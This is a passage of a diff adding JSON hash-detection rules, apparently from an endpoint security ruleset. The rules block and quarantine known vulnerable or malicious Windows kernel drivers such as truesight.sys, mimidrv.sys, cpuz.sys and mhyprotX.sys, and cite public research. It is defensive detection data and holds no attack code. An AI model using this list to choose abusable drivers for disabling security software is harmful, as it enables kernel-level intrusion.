+ "value": "2e01fc93068d3447fcee27f4d41bfe607ccb0a23c80bf3accd5578de30623b7f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e34249cf-8da0-5997-b98a-cc8c4d0b39cc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.471104Z",
+ "creation_date": "2026-03-23T11:45:30.471108Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.471117Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "577e381b5d36faf15cde84ed59c51e2dcb65d90140848111429e1c8cfb0553f5",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e34366a5-f864-5021-bb90-411b356f146a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491220Z",
+ "creation_date": "2026-03-23T11:45:31.491223Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491230Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2b6a4ce32a2e97c1f093266abfb29344ce3fa67943623bbeef76f16500ac749d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3457e60-53e0-5e3c-92eb-22443a9d625f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983264Z",
+ "creation_date": "2026-03-23T11:45:29.983266Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983271Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d7c683ef033ac2dc4dfa0dc61f39931f91c0e8fd19e613f664cb03e14112ef6e",
+ "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e37d40f3-f9b7-5c2f-80d4-2e7a91f6ba2e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152778Z",
+ "creation_date": "2026-03-23T11:45:31.152781Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152788Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6bb4baa4a8a4b078d79cfd5121ed6ba35b52a59cfb76e975fa68ca4feb39228a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e384213f-d380-5c64-a267-fb4d5916b9fe",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.481422Z",
+ "creation_date": "2026-03-23T11:45:31.481426Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.481436Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8ec96f1f1d48a9a6ed971de2bae57b37f5a4abe8e81e7376a9be53403f62582d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e384b630-08b0-59b7-813f-c9a6b87b9418",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474176Z",
+ "creation_date": "2026-03-23T11:45:30.474179Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474188Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d8e3548efca46a3aceca747622881843b170225957cffeacfd149c25907ecf2d",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3951ebf-e1a1-5b92-9012-b0523f46d94a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148364Z",
+ "creation_date": "2026-03-23T11:45:31.148366Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148372Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2abf81a54f0c87e8a84aa3cc947670a7e0d0c4a22cc9b64435de29fc3139bd9b",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3972cdf-ddf3-5289-9c01-63c995afe505",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968132Z",
+ "creation_date": "2026-03-23T11:45:29.968134Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968140Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8774638b1b77665496dde96f1016f498bd91c062a9133d4faef6feeb0b7778e7",
+ "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3b1ba13-a439-56f7-84da-c56124cde439",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148114Z",
+ "creation_date": "2026-03-23T11:45:31.148116Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148121Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3d23efbd84ed31fbb76a644d27553765f76725fbd97d02f9cdbc390ccb278bae",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3bc8849-22ad-5370-8d73-3a20875e7504",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477451Z",
+ "creation_date": "2026-03-23T11:45:31.477455Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477465Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "63142b7b40371b449f51a94b8fdfce02ab23e0b9b17539ffbc34caa03a8a3388",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3d329ba-1554-58e3-b9b1-5b2fafeb4fa7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.485579Z",
+ "creation_date": "2026-03-23T11:45:31.485582Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.485592Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a685c5633e5f84736ff0df187118feeafc957f8a41cfad02d121d380cf5e7e55",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3e578e2-95d1-5810-9d1c-fc0a555bebbf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611428Z",
+ "creation_date": "2026-03-23T11:45:29.611430Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611435Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "72f9cb24cfa641876f34967b96244259f95987ef24d1d729c0e483b3eb9a2740",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3e85930-6b6f-5346-ac89-d0e8d55e060f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836504Z",
+ "creation_date": "2026-03-23T11:45:30.836506Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836512Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ab3ef21f5a64c36ddacb54348711f94609850745824185b7286759e635a1c027",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3ea0e71-eec5-50fe-a18d-69c973fba937",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459157Z",
+ "creation_date": "2026-03-23T11:45:30.459160Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459169Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0f3e7bf7b103613844a38afb574817ddaecd00e4d206d891660dbb0e5dfee04e",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3f1aa89-8f1d-5130-b392-08007300f9d8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474090Z",
+ "creation_date": "2026-03-23T11:45:30.474093Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "14b04931ee50e5d2560f42cc33b05f047886a8a7d45b3274ae78e5646a1cf1a5",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3f3721a-89fc-568a-9006-09b242e5680f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612018Z",
+ "creation_date": "2026-03-23T11:45:29.612020Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612027Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0c512b615eac374d4d494e3c36838d8e788b3dc2691bf27916f7f42694b14467",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3fc9596-6771-530c-95a8-a5e6dfe1d0f9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976389Z",
+ "creation_date": "2026-03-23T11:45:29.976391Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976400Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0440ef40c46fdd2b5d86e7feef8577a8591de862cfd7928cdbcc8f47b8fa3ffc",
+ "comment": "Malicious attestation-signed Drivers (aka NodeDriver.sys, 4.sys, Air_SYSTEM10.sys etc.) [https://www.mandiant.com/resources/blog/hunting-attestation-signed-malware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3fd6c85-c1bc-5f85-b843-60329bd5f6f2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.457965Z",
+ "creation_date": "2026-03-23T11:45:30.457968Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.457977Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "653f6a65e0e608cae217bea2f90f05d8125cf23f83ba01a60de0f5659cfa5d4d",
+ "comment": "Vulnerable Kernel Driver (aka nscm.sys) [https://www.loldrivers.io/drivers/351ff5ca-f07b-4eb6-9300-d5d31514defb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e3ff176c-17f0-5022-ac80-52219112f312",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612774Z",
+ "creation_date": "2026-03-23T11:45:29.612776Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612782Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1631d124bd8b2917c37abfe0f7b3dfa9e309ec54f69bdab2e2b5de3929d523d7",
+ "comment": "ASUS WinFlash vulnerable driver (aka ATSZIO.sys and ATSZIO64.sys) [https://github.com/Chigusa0w0/AsusDriversPrivEscala/blob/master/ATSZIO.md] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e41669fa-7c44-5aa2-a90b-b93dd4c6dc6f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824461Z",
+ "creation_date": "2026-03-23T11:45:31.824464Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824472Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "153533a9f0457d657ba83aa8266b9682ec4be382c5ba7e9b2a8f46c8e40f1847",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e419957d-8a5d-57b8-aade-b4206bef0dc8",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145412Z",
+ "creation_date": "2026-03-23T11:45:31.145414Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145420Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5df6f4e9933b3daca829cd5655b87c96b00660a5ac676a78daa8ae48ae77b820",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "e42ae20d-cc86-5322-a490-4b9cf30f150a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981801Z",
+ "creation_date": "2026-03-23T11:45:29.981803Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.981809Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dfaefd06b680f9ea837e7815fc1cc7d1f4cc375641ac850667ab20739f46ad22",
+ "comment": "Vulnerable Kernel Driver (aka netfilter2.sys) [https://www.loldrivers.io/drivers/5ad8a3b6-6d20-4c95-8fa7-9a507167ba3c/] [authentihash SHA256]",
